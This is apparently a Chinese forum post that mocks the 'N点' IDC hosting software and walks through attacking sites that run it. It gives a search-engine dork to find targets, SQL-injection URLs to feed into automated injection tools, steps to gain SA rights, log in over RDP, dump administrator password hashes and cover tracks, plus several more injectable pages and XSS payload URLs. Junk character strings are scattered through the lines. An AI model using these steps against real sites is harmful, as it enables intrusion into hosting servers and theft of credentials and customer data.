不得不说N点实在是一个破东西
. p/ L. S$ C3 J4 E' z, N" [就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
* B1 k( C, D8 F% X" e好吧 抱怨一下就行了 接下来关键的时候到了
6 m3 O* c7 z8 ?( Z4 q$ ~0 c首先百度搜索关键字:inurl: (mmdatabase.asp)3 G% @" p7 H" X2 C1 ?
我随便列举一个: www.xxxx.com
0 b9 n2 [- F" i- a8 E修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
q: W4 O1 H! H. X8 ^! Q( A扔入NBSI 或者啊D等各种傻逼工具后) p9 p. G' D. ~* q
你们会看到是SA权限
0 [, u2 b6 u+ G) C6 q3 f: M: u1 ]4 g果断3389 上去 hash得到administrator密码( G0 v4 T3 j! X# Q5 c% {
擦屁股走人~
: v: f% K) z5 |经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
1 Y, n( C+ Q8 w$ U
! g6 t9 W+ J7 d+ U5 `& _再附上其他几个漏洞页面8 p/ x! f# ^8 j0 d+ _6 j
SQL:
1 J, L6 ~3 `& p4 G, ^$ _- Vhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
( L! Z0 l0 C: v0 [' F+ Z! Ghttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
" }- _$ m& G1 h# Nhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
* F2 T+ ~# G1 {: T* Uhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
: I0 t) h @9 zXSS证明:2 ~9 O9 Z( Y+ |+ m! x
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
) B" Z7 r4 v( \; khttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
Z! K2 w* o9 E; q: o* jhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
$ o2 C' C# q4 R% d* t由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜: r) ^! L' T3 t
还是星外吧 你们懂的
% d5 s4 [ w% \2 L% d作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?" w2 `5 I: v; M- Z: M
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉7 ~, m1 o6 j5 b* d+ ^9 ]
——- |